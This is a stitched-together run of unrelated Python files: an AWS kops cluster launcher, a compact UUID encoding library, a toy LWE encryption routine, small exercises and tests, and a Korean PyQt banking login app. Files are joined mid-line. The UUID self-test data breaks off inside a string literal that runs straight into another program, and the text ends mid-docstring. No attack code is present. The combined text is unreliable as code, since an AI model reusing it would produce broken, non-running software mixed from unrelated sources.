The corresponding public key is' + ' assumed to have the same path and end in .pub.') print() print('If no config file is specific, the default base config file in ' + '$FLUENT_HOME/conf/kvs-base.yml will be used.') sys.exit(1) mem, ebs, func, sched, route, bench = parse_args(sys.argv[1:], 6, int) cluster_name = util.check_or_get_env_arg('FLUENT_CLUSTER_NAME') kops_bucket = util.check_or_get_env_arg('KOPS_STATE_STORE') aws_key_id = util.check_or_get_env_arg('AWS_ACCESS_KEY_ID') aws_key = util.check_or_get_env_arg('AWS_SECRET_ACCESS_KEY') conf_file = '../conf/kvs-base.yml' if len(sys.argv) <= 7 else sys.argv[7] ssh_key = '/home/ubuntu/.ssh/id_rsa' if len(sys.argv) <= 8 else sys.argv[8] create_cluster(mem, ebs, func, sched, route, bench, conf_file, ssh_key, cluster_name, kops_bucket, aws_key_id, aws_key) from webserver.storage.factory import StorageFactory def test_connect_to_cloud_storage(): storage = StorageFactory.cloud() print(storage) test_connect_to_cloud_storage()from AlphaGomoku.process_data import * tuples = [ ([(0, 0), (1, 1), (2, 2)], (3, 3), 1.0), ([(0, 0), (2, 2)], (1, 1), 1.0), ([], (1, 1), 2.0) ] nodes = tuples_to_tree(tuples) print([(node.data_container, node.children) for node in nodes]) json_object = tree_to_json(nodes) print(json_object) nodes = json_to_tree(json_object) print([(node.data_container, node.children) for node in nodes]) tuples = tree_to_tuples(nodes) print(tuples) # -*- coding: utf-8 -*- # # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # from __future__ import absolute_import, division __all__ = ['UUID', 'uuid', 'uuid1', 'uuid3', 'uuid4', 'uuid5', 'unserialise', 'encode', 'decode', 'encode_uuid', 'decode_uuid', 'NAMESPACE_DNS', 'NAMESPACE_URL', 'NAMESPACE_OID', 'NAMESPACE_X500'] import six import uuid as _uuid try: from . 
import base_x except ValueError: import base_x try: from .mertwis import MT19937 except ValueError: from mertwis import MT19937 def fnv_1a(num): # calculate FNV-1a hash fnv = 0xcbf29ce484222325 while num: fnv ^= num & 0xff fnv *= 0x100000001b3 fnv &= 0xffffffffffffffff num >>= 8 return fnv def xor_fold(num, bits): # xor-fold to n bits: folded = 0 while num: folded ^= num num >>= bits return folded def unserialise(serialised): uuids = [] while serialised: uuid, length = UUID._unserialise(serialised) uuids.append(uuid) serialised = serialised[length:] return uuids def encode(serialised, encoding='encoded'): if isinstance(serialised, six.string_types): if encoding == 'guid': return b';'.join('{%s}' % u for u in unserialise(serialised)) elif encoding == 'urn': return b'urn:uuid:' + ';'.join(unserialise(serialised)) elif encoding == 'encoded': if ord(serialised[0]) != 1 and ((ord(serialised[-1]) & 1) or (len(serialised) >= 6 and ord(serialised[-6]) & 2)): return b'~' + UUID.ENCODER.encode(serialised) return b';'.join(unserialise(serialised)) raise ValueError("Invalid serialised UUID: %r" % serialised) def decode(encoded): if isinstance(encoded, six.string_types): if len(encoded) > 2: if encoded[0] == '{' and encoded[-1] == '}': encoded = encoded[1:-1] elif encoded.startswith('urn:uuid:'): encoded = encoded[9:] if encoded: encoded = encoded.split(';') if isinstance(encoded, (list, tuple)): serialised = b''.join(UUID._decode(u) for u in encoded) return serialised raise ValueError("Invalid encoded UUID: %r" % encoded) def encode_uuid(uuid): if uuid is None: raise ValueError("Cannot encode None") if not isinstance(uuid, UUID): uuid = UUID(uuid) return uuid.encode() def decode_uuid(code): return UUID.unserialise(decode(code)) class UUID(six.binary_type, _uuid.UUID): """ Compact UUID Anonymous UUID is 00000000-0000-1000-8000-010000000000 """ # 0 1 2 3 # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | time_low | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | time_mid | time_hi_and_version | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |clk_seq_hi_res | clk_seq_low | node (0-1) | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | node (2-5) | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # # time = 60 bits # clock = 14 bits # node = 48 bits ENCODER = base_x.b59 UUID_TIME_EPOCH = 0x01b21dd213814000 UUID_TIME_YEAR = 0x00011f0241243c00 UUID_TIME_INITIAL = UUID_TIME_EPOCH + (2016 - 1970) * UUID_TIME_YEAR UUID_MIN_SERIALISED_LENGTH = 2 UUID_MAX_SERIALISED_LENGTH = 17 UUID_LENGTH = 36 TIME_BITS = 60 VERSION_BITS = 64 - TIME_BITS COMPACTED_BITS = 1 SALT_BITS = 7 CLOCK_BITS = 14 NODE_BITS = 48 PADDING_BITS = 64 - COMPACTED_BITS - SALT_BITS - CLOCK_BITS PADDING1_BITS = 64 - COMPACTED_BITS - NODE_BITS - CLOCK_BITS VARIANT_BITS = 2 TIME_MASK = ((1 << TIME_BITS) - 1) SALT_MASK = ((1 << SALT_BITS) - 1) CLOCK_MASK = ((1 << CLOCK_BITS) - 1) NODE_MASK = ((1 << NODE_BITS) - 1) COMPACTED_MASK = ((1 << COMPACTED_BITS) - 1) VERSION_MASK = ((1 << VERSION_BITS) - 1) VARIANT_MASK = ((1 << VARIANT_BITS) - 1) # Lengths table VL = [ [[0x1c, 0xfc], [0x1c, 0xfc]], # 4: 00011100 11111100 00011100 11111100 [[0x18, 0xfc], [0x18, 0xfc]], # 5: 00011000 11111100 00011000 11111100 [[0x14, 0xfc], [0x14, 0xfc]], # 6: 00010100 11111100 00010100 11111100 [[0x10, 0xfc], [0x10, 0xfc]], # 7: 00010000 11111100 00010000 11111100 [[0x04, 0xfc], [0x40, 0xc0]], # 8: 
00000100 11111100 01000000 11000000 [[0x0a, 0xfe], [0xa0, 0xe0]], # 9: 00001010 11111110 10100000 11100000 [[0x08, 0xfe], [0x80, 0xe0]], # 10: 00001000 11111110 10000000 11100000 [[0x02, 0xff], [0x20, 0xf0]], # 11: 00000010 11111111 00100000 11110000 [[0x03, 0xff], [0x30, 0xf0]], # 12: 00000011 11111111 00110000 11110000 [[0x0c, 0xff], [0xc0, 0xf0]], # 13: 00001100 11111111 11000000 11110000 [[0x0d, 0xff], [0xd0, 0xf0]], # 14: 00001101 11111111 11010000 11110000 [[0x0e, 0xff], [0xe0, 0xf0]], # 15: 00001110 11111111 11100000 11110000 [[0x0f, 0xff], [0xf0, 0xf0]], # 16: 00001111 11111111 11110000 11110000 ] def __new__(cls, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): try: string = data if data is not None else hex u = cls._uuid(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version, data=data) self = six.binary_type.__new__(cls, u) self.__dict__['int'] = u.int return self except Exception: return six.binary_type.__new__(cls, string) def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): if 'int' not in self.__dict__: u = self._uuid(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version, data=data) self.__dict__['int'] = u.int @classmethod def _uuid(cls, hex=None, bytes=None, bytes_le=None, fields=None, int=None, version=None, data=None): if [hex, bytes, bytes_le, fields, int, data].count(None) != 5: raise TypeError('need one of hex, bytes, bytes_le, fields, or int') if data is not None: num = 0 for d in data: num <<= 8 num |= ord(d) node = ((num << 1) & 0xfe0000000000) | num & 0x00ffffffffff num >>= 47 clock_seq_low = num & 0xff num >>= 8 clock_seq_hi_variant = num & 0x3f num >>= 6 time_low = num & 0xffffffff num >>= 32 time_mid = num & 0xffff num >>= 16 time_hi_version = num & 0xfff num >>= 12 if num: raise ValueError("UUIDs can only store as much as 15 bytes") time_hi_version |= 0x1000 # Version 1 clock_seq_hi_variant |= 0x80 # Variant: RFC 4122 node |= 0x010000000000 # Multicast bit set fields = (time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node) elif hex is not None: if isinstance(hex, six.string_types): hex = cls._decode_uuid(hex, 1) if isinstance(hex, _uuid.UUID): int, hex = hex.int, None return _uuid.UUID(hex=hex, bytes=bytes, bytes_le=bytes_le, fields=fields, int=int, version=version) @classmethod def _is_serialised(cls, serialised, count=None): while serialised: if count is not None: if not count: return False count -= 1 size = len(serialised) if size < 2: return False byte0 = ord(serialised[0]) if byte0 == 1: length = 17 else: length = size q = bool(byte0 & 0xf0) for i in six.moves.range(13): if cls.VL[i][q][0] == (byte0 & cls.VL[i][q][1]): length = i + 4 break if size < length: return False serialised = serialised[length:] return True @classmethod def _decode(cls, encoded, count=None): if len(encoded) >= 7 and encoded[0] == '~': serialised = cls.ENCODER.decode(encoded) if cls._is_serialised(serialised, count): return serialised u = cls(_uuid.UUID(encoded)) return u.serialise() @classmethod def _decode_uuid(cls, encoded, count=None): if len(encoded) >= 7 and encoded[0] == '~': serialised = cls.ENCODER.decode(encoded) if cls._is_serialised(serialised, count): return cls.unserialise(serialised) u = _uuid.UUID(encoded) return u @classmethod def _unserialise_condensed(cls, serialised): size = len(serialised) length = size byte0 = ord(serialised[0]) q = bool(byte0 & 0xf0) for i in six.moves.range(13): if 
cls.VL[i][q][0] == (byte0 & cls.VL[i][q][1]): length = i + 4 break if size < length: raise ValueError("Bad encoded uuid") list_bytes_ = list(serialised[:length]) byte0 &= ~cls.VL[i][q][1] list_bytes_[0] = chr(byte0) meat = 0 for s in list_bytes_: meat <<= 8 meat |= ord(s) compacted = meat & 1 meat >>= cls.COMPACTED_BITS if compacted: salt = meat & cls.SALT_MASK meat >>= cls.SALT_BITS clock = meat & cls.CLOCK_MASK meat >>= cls.CLOCK_BITS time = meat & cls.TIME_MASK node = cls._calculate_node(time, clock, salt) else: node = meat & cls.NODE_MASK meat >>= cls.NODE_BITS clock = meat & cls.CLOCK_MASK meat >>= cls.CLOCK_BITS time = meat & cls.TIME_MASK if time: if compacted: time = ((time << cls.CLOCK_BITS) + cls.UUID_TIME_INITIAL) & cls.TIME_MASK elif not (node & 0x010000000000): time = (time + cls.UUID_TIME_INITIAL) & cls.TIME_MASK time_low = time & 0xffffffff time_mid = (time >> 32) & 0xffff time_hi_version = (time >> 48) & 0xfff time_hi_version |= 0x1000 clock_seq_low = clock & 0xff clock_seq_hi_variant = (clock >> 8) & 0x3f | 0x80 # Variant: RFC 4122 return cls(fields=(time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node)), length @classmethod def _unserialise_full(cls, serialised): if len(serialised) < 17: raise ValueError("Bad encoded uuid %s" % repr(serialised)) return cls(bytes=serialised[1:17]), 17 @classmethod def _unserialise(cls, serialised): if serialised is None or len(serialised) < 2: raise ValueError("Bad encoded uuid %s" % repr(serialised)) if (serialised and ord(serialised[0]) == 1): return cls._unserialise_full(serialised) else: return cls._unserialise_condensed(serialised) @classmethod def _calculate_node(cls, time, clock, salt): if not time and not clock and not salt: return 0x010000000000 seed = 0 seed ^= fnv_1a(time) seed ^= fnv_1a(clock) seed ^= fnv_1a(salt) g = MT19937(seed & 0xffffffff) node = g() node <<= 32 node |= g() node &= cls.NODE_MASK & ~cls.SALT_MASK node |= salt node |= 0x010000000000 # set multicast bit return node @classmethod def _serialise(cls, self): variant = ord(self.bytes[8]) & 0xc0 version = ord(self.bytes[6]) >> 4 if variant == 0x80 and version == 1: node = self.node & cls.NODE_MASK clock = self.clock_seq & cls.CLOCK_MASK time = self.time & cls.TIME_MASK compacted_time = ((time - cls.UUID_TIME_INITIAL) & cls.TIME_MASK) if time else 0 compacted_time_clock = compacted_time & cls.CLOCK_MASK compacted_time >>= cls.CLOCK_BITS compacted_clock = clock ^ compacted_time_clock if node & 0x010000000000: salt = node & cls.SALT_MASK else: salt = fnv_1a(node) salt = xor_fold(salt, cls.SALT_BITS) salt = salt & cls.SALT_MASK compacted_node = cls._calculate_node(compacted_time, compacted_clock, salt) compacted = node == compacted_node if compacted: meat = compacted_time meat <<= cls.CLOCK_BITS meat |= compacted_clock meat <<= cls.SALT_BITS meat |= salt meat <<= cls.COMPACTED_BITS meat |= 1 else: if not (node & 0x010000000000): if time: time = (time - cls.UUID_TIME_INITIAL) & cls.TIME_MASK meat = time meat <<= cls.CLOCK_BITS meat |= clock meat <<= cls.NODE_BITS meat |= node meat <<= cls.COMPACTED_BITS serialised = [] while meat or len(serialised) < 4: serialised.append(meat & 0xff) meat >>= 8 length = len(serialised) - 4 if serialised[-1] & cls.VL[length][0][1]: if serialised[-1] & cls.VL[length][1][1]: serialised.append(cls.VL[length + 1][0][0]) else: serialised[-1] |= cls.VL[length][1][0] else: serialised[-1] |= cls.VL[length][0][0] serialised = ''.join(chr(c) for c in reversed(serialised)) if compacted_time: compacted_time = 
((compacted_time << cls.CLOCK_BITS) + cls.UUID_TIME_INITIAL) & cls.TIME_MASK else: compacted_node = None compacted_time = None compacted_clock = None serialised = chr(0x01) + self.bytes return serialised, compacted_node, compacted_time, compacted_clock @classmethod def new(cls, data=None, compacted=None): if data is not None: return UUID(data=data) num = UUID(_uuid.uuid1()) if compacted or compacted is None: num = num.compact_crush() or num return num @classmethod def unserialise(cls, serialised): uuid, length = cls._unserialise(serialised) if length > len(serialised): raise ValueError("Invalid serialised uuid %s" % serialised) return uuid def serialise(self): if '_serialised' not in self.__dict__: self.__dict__['_serialised'], self.__dict__['_compacted_node'], self.__dict__['_compacted_time'], self.__dict__['_compacted_clock'] = self._serialise(self) return self.__dict__['_serialised'] def compact_crush(self): if '_compacted_node' not in self.__dict__: self.serialise() node = self.__dict__['_compacted_node'] if node is not None: time = self.__dict__['_compacted_time'] clock = self.__dict__['_compacted_clock'] time_low = time & 0xffffffff time_mid = (time >> 32) & 0xffff time_hi_version = (time >> 48) & 0xfff time_hi_version |= 0x1000 clock_seq_low = clock & 0xff clock_seq_hi_variant = (clock >> 8) & 0x3f | 0x80 # Variant: RFC 4122 return self.__class__(fields=(time_low, time_mid, time_hi_version, clock_seq_hi_variant, clock_seq_low, node)) def encode(self, encoding='encoded'): return encode(self.serialise(), encoding) def data(self): num = 0 version = self.version variant = self.clock_seq_hi_variant & 0x80 if variant == 0x80 and version == 1 and self.node & 0x010000000000: num <<= 12 num |= self.time_hi_version & 0xfff num <<= 16 num |= self.time_mid & 0xffff num <<= 32 num |= self.time_low & 0xffffffff num <<= 6 num |= self.clock_seq_hi_variant & 0x3f num <<= 8 num |= self.clock_seq_low & 0xff num <<= 47 num |= ((self.node & 0xfe0000000000) >> 1) | (self.node & 0x00ffffffffff) data = [] while num: data.append(chr(num & 0xff)) num >>= 8 return ''.join(reversed(data)) def iscompact(self): if '_compacted_node' not in self.__dict__: self.serialise() return self.__dict__['_compacted_node'] == self.node # Compatibility with builtin uuid def uuid(data=None, compacted=None): return UUID.new(data=data, compacted=compacted) def uuid1(node=None, clock_seq=None): return UUID(_uuid.uuid1(node=node, clock_seq=clock_seq)) def uuid3(namespace, name): return UUID(_uuid.uuid3(namespace, name)) def uuid4(): return UUID(_uuid.uuid4()) def uuid5(namespace, name): return UUID(_uuid.uuid5(namespace, name)) # The following standard UUIDs are for use with uuid3() or uuid5(). 
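# Example (illustrative): the name-based constructors are deterministic, so
# uuid5(NAMESPACE_DNS, 'python.org') returns the same compact UUID on every
# call; the same holds for uuid3() with any of the namespaces defined below.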
NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8') NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8') if __name__ == '__main__': errors = 0 uuids = [ # Full: ('5759b016-10c0-4526-a981-47d6d19f6fb4', ['5759b016-10c0-4526-a981-47d6d19f6fb4'], repr('5759b016-10c0-4526-a981-47d6d19f6fb4'), repr('\x01WY\xb0\x16\x10\xc0E&\xa9\x81G\xd6\xd1\x9fo\xb4')), ('e8b13d1b-665f-4f4c-aa83-76fa782b030a', ['e8b13d1b-665f-4f4c-aa83-76fa782b030a'], repr('e8b13d1b-665f-4f4c-aa83-76fa782b030a'), repr('\x01\xe8\xb1=\x1bf_OL\xaa\x83v\xfax+\x03\n')), # Condensed: ('00000000-0000-1000-8000-000000000000', ['00000000-0000-1000-8000-000000000000'], repr('00000000-0000-1000-8000-000000000000'), repr('\x1c\x00\x00\x00')), ('11111111-1111-1111-8111-111111111111', ['11111111-1111-1111-8111-111111111111'], repr('~GcL2nemYXfTUrDbsYYiTDNc'), repr('\x0f\x88\x88\x88\x88\x88\x88\x88\x82"""""""')), # Condensed + Compacted: ('230c0800-dc3c-11e7-b966-a3ab262e682b', ['230c0800-dc3c-11e7-b966-a3ab262e682b'], repr('~SsQg3rJrx3P'), repr('\x06,\x02[\b9fW')), ('f2238800-debf-11e7-bbf7-dffcee0c03ab', ['f2238800-debf-11e7-bbf7-dffcee0c03ab'], repr('~SlMSibYTT8c'), repr('\x06.\x86*\x1f\xbb\xf7W')), # Condensed + Expanded: ('60579016-dec5-11e7-b616-34363bc9ddd6', ['60579016-dec5-11e7-b616-34363bc9ddd6'], repr('60579016-dec5-11e7-b616-34363bc9ddd6'), repr('\xe1\x17E\xcc)\xc4\x0bl,hlw\x93\xbb\xac')), ('4ec97478-c3a9-11e6-bbd0-a46ba9ba5662', ['4ec97478-c3a9-11e6-bbd0-a46ba9ba5662'], repr('4ec97478-c3a9-11e6-bbd0-a46ba9ba5662'), repr('\x0e\x89\xb7\xc3b\xb60 n, m = map(int, input().split()) path = [0] * n for i in range(m): a, b = map(int, input().split()) a -= 1 b -= 1 path[a] += 1 path[b] += 1 for i in range(n): print(path[i]) import logging import numpy import rvg from ciphertext import Ciphertext seed = 5684 def BitEncrypter(A, b, mbit, modulus, log=logging.getLogger(__name__)): mbit = 1 & mbit # we only want a bit m0 = len(A) # r is probably not correct... r = numpy.ndarray([m0, 1], dtype=numpy.integer) #generate random vector r<-{0,1}^m? s = rvg.RVG(m0, 2, seed) sp = s.generate() sp = next(sp) r[:, 0] = sp[:] & 1 # Need to use dot here, because in numpy dot is actually matrix multiplication while * is not. # Very intuitive! 
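    # Descriptive note (not from the original author): the two lines below follow
    # the standard Regev/LWE public-key encryption step -- with a random 0/1
    # vector r, the ciphertext is v = (A^T r) mod q together with
    # w = (b^T r + m) mod q.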
\s log.debug("R={r}\nA={A}\n m={m}".format(r=r, A=A, m=mbit)) v = numpy.asarray(numpy.mod(A.T.dot(r).T, modulus)) w = (b.T.dot(r) + mbit) % modulus ciphertext = Ciphertext(numpy.squeeze(v), w.item(0), 0) log.debug("Ciphertext={c}".format(c=ciphertext)) return ciphertext def MessageEncrypter(A, b, m, modulus, log=logging.getLogger(__name__)): bstring = bin(m) out = [] for i in range(2, len(bstring)): # Need to convert back to int, so that operation in BitEncrypter do not throw exceptions out.append(BitEncrypter(A, b, int(bstring[i]), modulus, log=log)) return out n = int(input ('Digite um número: ')) raiz = n** (1/2) dobro= n*2 triplo= n*3 print('O dobro de {} vale {}.'.format(n,dobro)) print('O triplo de {} vale {}.'.format(n,triplo)) print('A raiz quadrada de {} é igual a {:.2f}.'.format(n,pow(n,(1/2))))juanshishido/codewarskyu6/tests/test_autocomplete.py import unittest from kyu6.autocomplete import autocomplete class TestAutocomplete(unittest.TestCase): dictionary = ['abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport', 'amazing', 'apple', 'ball' ] def test_ai(self): self.assertEquals(['airplane', 'airport'], autocomplete('ai', self.dictionary)) def test_a(self): self.assertEquals(['abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport'], autocomplete('a', self.dictionary)) def test_nonalpha(self): self.assertEquals(['ball'], autocomplete('b$%^', self.dictionary)) 10-100 def SieveOfEratosthenes(n): prime = [True for i in range(n+1)] p = 2 while(p*p<=n): if prime[p] == True: for i in range(p*p,n+1,p): prime[i] = False p += 1 return prime x = SieveOfEratosthenes(50) for i in range(2,len(x)): if x[i]: print(i,end=' ') ############################################### # import required module import sys from PyQt5.QtWidgets import * from PyQt5.Qt import * import pandas as pd import numpy as np import matplotlib.pyplot as plt import random import time from module.LRUCache import * from module.astro_secret import * import module.linear_regression as lin ############################################### loginCache = LRUCache(1) countCache = LRUCache(2) prev_user = "" userTable = pd.read_csv('DB/userTable.csv') full_reg_Table = pd.read_csv('DB/full_reg_table.csv') loginCount = 0 loginAction = False # 로그인을 했는지 안했는지 알려주는 변수, 값이 False이면 로그인을 안했다는 뜻 loginedLine = -1 # 로그인한 계정이 몇번째 줄에 있는지 알려주는 변수, 값이 -1이면 로그인 안함 userID = [PWEncoding(Decoding(userTable['keyID'].iloc[i], userTable['Name'].iloc[i])) for i in range(len(userTable.index))] # 로그인 폼 class LoginForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - Login") self.resize(500, 600) pixmap = QPixmap('img/logo.png') lbl_img = QLabel() lbl_img.setPixmap(pixmap) # lbl_img = pixmap.scaled(300,300) lbl_img.setMaximumWidth(300) lbl_img.setMaximumHeight(300) layout = QGridLayout() layout2 = QHBoxLayout() self.lbl_ID = QLabel('ID') self.lbl_ID.setStyleSheet("color: #000000;" "border-style: solid;" "border-width: 2px;" "border-color: #AADBDD;" "background-color: #AADBDD;") self.lbl_PW = QLabel('Password') self.lbl_PW.setStyleSheet("color: #000000;" "border-style: solid;" "border-width: 2px;" "border-color: #AADBDD;" "background-color: #AADBDD;") layout2.addWidget(lbl_img) # label_name = QLabel("") self.lineEdit_ID = QLineEdit() self.lineEdit_ID.setPlaceholderText("아이디를 입력하세요.") self.lineEdit_ID.setMaximumWidth(120) layout.addWidget(self.lbl_ID, 1, 0) # layout.addWidget(label_name, 0, 0) layout.addWidget(self.lineEdit_ID, 1, 1) # label_password = QLabel("") self.lineEdit_password = QLineEdit() 
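        # Descriptive note: placeholder "패스워드를 입력하세요." means "Enter your
        # password."; the following lines cap the field width at 120px and set
        # echo mode to QLineEdit.Password so typed characters are masked.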
self.lineEdit_password.setPlaceholderText("패스워드를 입력하세요.") self.lineEdit_password.setMaximumWidth(120) layout.addWidget(self.lbl_PW, 1, 2) self.lineEdit_password.setEchoMode(QLineEdit.Password) # layout.addWidget(label_password, 0, 2) layout.addWidget(self.lineEdit_password, 1, 3) layout3 = QHBoxLayout() button_signup = QPushButton("로그인") button_signup.setMaximumWidth(120) button_signup.setMaximumHeight(80) button_signup.clicked.connect(self.login) layout3.addWidget(button_signup) # layout3.setRowMinimumHeight(2, 1) button_register = QPushButton("회원가입") button_register.setMaximumWidth(120) button_register.setMaximumHeight(80) button_register.clicked.connect(self.register) layout3.addWidget(button_register) # layout3.setRowMinimumHeight(2, 2) layout4 = QVBoxLayout() layout4.addLayout(layout2) layout4.addLayout(layout) layout4.addLayout(layout3) self.setLayout(layout4) """ # LRU Cache를 이용한 로그인 시스템 로직: 만약 잘못된 로그인 횟수가 5회 이상일 때 1초 딜레이 만약 ID 또는 Password를 입력하지 않고 로그인 버튼을 눌렀을 때 "ID 또는 PW를 입력해주세요."(이)라고 출력 만약 ID 또는 Password를 입력하고 로그인 버튼을 눌렀을 때 만약 loginCache.nodeMap에 입력한 ID값이라는 캐시에 카운트가 3 이상이라면 만약 userName과 입력한 ID값이 같다면 만약 loginCache.nodeMap에 userName이라는 key에 value값이 입력한 PW값을 해싱한 값과 같다면 loginAction을 True로 설정, loginCout를 0으로 설정 loginCache에 key는 입력한 ID값, value는 입력한 PW값을 해싱한 값 저장 '로그인에 성공했습니다.'(이)라고 출력 만약 loginCache.nodeMap에 userName이라는 key에 value값이 입력한 PW값을 해싱한 값과 다르면 '로그인에 실패했습니다.'(이)라고 출력 만약 loginCache.nodeMap에 입력한 ID값이라는 캐시에 카운트가 3 미만이라면 userTable에 index만큼 반복 enc_ID(이)라는 변수에 입력한 ID값을 암호화 enc_PW(이)라는 변수에 입력한 PW값을 해싱 만약 enc_ID[0](keyID) enc_ID[1](valueID)로 디코딩한 값이 userTable에 'keyID'(이)라는 열, i번째 행 데이터와 'Name'(이)라는 열, i번째 행 데이터로 디코딩한 값과 같다면 만약 enc_PW값이 입력한 PW값을 해싱한 값과 같다면 loginAction을 True로 설정, loginLine을 i로 설정과 함께 "로그인에 성공했습니다"(이)라고 출력 만약 enc_PW값이 입력한 PW값을 해싱한 값과 다르다면 '로그인에 실패했습니다.'(이)라고 출력 """ def login(self): msg = QMessageBox() start = time.time() global prev_user, loginCount, loginAction, loginedLine if loginCount >= 5: time.sleep(1) if not self.lineEdit_ID.text() or not self.lineEdit_password.text(): loginCount += 1 msg.setText('ID 또는 PW를 입력해주세요.') msg.exec_() else: # Cache Login if loginCache.nodeMap.get(self.lineEdit_ID.text(), [-1, 0])[1] >= 3: if prev_user == self.lineEdit_ID.text(): if loginCache.nodeMap.get(prev_user, [-1, 0])[0] == PWEncoding(self.lineEdit_password.text()): loginAction = True loginCount = 0 loginCache.put(self.lineEdit_ID.text(), PWEncoding(self.lineEdit_password.text())) print("Cache Login time :", time.time() - start) msg.setText('로그인에 성공했습니다.') msg.exec_() self.gomain() self.close() # 로그인 폼 끄기 else: loginCount += 1 msg.setText('로그인에 실패했습니다.') msg.exec_() # Default Login else: for i in range(len(userTable.index)): enc_ID = Encoding(self.lineEdit_ID.text()) enc_PW = PWEncoding(self.lineEdit_password.text()) if Decoding(enc_ID[0], enc_ID[1]) == Decoding(userTable['keyID'].iloc[i], userTable['Name'].iloc[i]): if enc_PW == userTable['Pw'].iloc[i]: loginAction = True loginedLine = i prev_user = Decoding( userTable['keyID'].iloc[i], userTable['Name'].iloc[i]) loginCache.put(prev_user, userTable['Pw'].iloc[i]) loginCount = 0 print("Login time :", time.time() - start) msg.setText('로그인에 성공했습니다.') msg.exec_() self.gomain() self.suggest() self.close() # 로그인 폼 끄기 else: loginCount += 1 msg.setText('로그인에 실패했습니다.') msg.exec_() break # 메인폼으로 가기 위한 시스템 def gomain(self): msg = QMessageBox() self.main = MainForm() # 팝업 회원가입 폼 self.main.setGeometry(QRect(100, 100, 180, 500)) # 팝업 self.main.show() def suggest(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") 
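            # Translation note: "로그인이 필요합니다." = "You need to log in."
            # Other recurring UI strings in this module: "로그인에 성공했습니다." =
            # "Login succeeded.", "로그인에 실패했습니다." = "Login failed.",
            # "잔액이 부족합니다." = "Insufficient balance.",
            # "정확한 금액을 입력해주세요" = "Please enter a valid amount."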
msg.exec_() else: usersum = lin.linear_regression_suggest(full_reg_Table, 'Age', 'Money', 'Credit_level', 'Grade', userTable['Age'].iloc[loginedLine], int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])), userTable['Rate'].iloc[loginedLine]) if round(usersum) <= 1: res = "햇살론" elif 1 < round(usersum) <= 2: res = "금리 4% 인생핀다론" elif 2 < round(usersum) <= 3: res = "우리자유적금" elif 3 < round(usersum) <= 4: res = "우리적금" elif 4 < round(usersum) <= 5: res = "우리큐브" elif 5 < round(usersum): res = "두루두루정기예금" msg.setText(self.lineEdit_ID.text() + "님, " + res + " 상품은 어떠신가요?") msg.exec_() def register(self): msg = QMessageBox() self.signup = SignUpForm() # 팝업 회원가입 폼 self.signup.setGeometry(QRect(100, 100, 400, 200)) # 팝업 self.signup.show() # 회원가입 폼 표시 # 회원가입 폼 class SignUpForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - SignUp") self.resize(300, 500) layout = QGridLayout() label_name = QLabel("ID") self.lineEdit_ID = QLineEdit() self.lineEdit_ID.setPlaceholderText("아이디를 입력하세요.") layout.addWidget(label_name, 0, 0) layout.addWidget(self.lineEdit_ID, 0, 1) label_password = QLabel("Password") self.lineEdit_password = QLineEdit() self.lineEdit_password.setPlaceholderText("패스워드를 입력하세요.") layout.addWidget(label_password, 1, 0) layout.addWidget(self.lineEdit_password, 1, 1) label_password_check = QLabel("Password 확인") self.lineEdit_password_check = QLineEdit() self.lineEdit_password_check.setPlaceholderText("패스워드를 다시 입력하세요.") layout.addWidget(label_password_check, 2, 0) layout.addWidget(self.lineEdit_password_check, 2, 1) label_age = QLabel("나이") self.lineEdit_age = QLineEdit() self.lineEdit_age.setPlaceholderText("나이를 입력하세요.") layout.addWidget(label_age, 3, 0) layout.addWidget(self.lineEdit_age, 3, 1) button_signup = QPushButton("회원가입") button_signup.clicked.connect(self.signup) layout.addWidget(button_signup, 4, 1) layout.setRowMinimumHeight(4, 40) self.setLayout(layout) """ # 회원가입 시스템 로직: 만약 ID 또는 Password를 입력하지 않고 회원가입 버튼을 눌렀다면 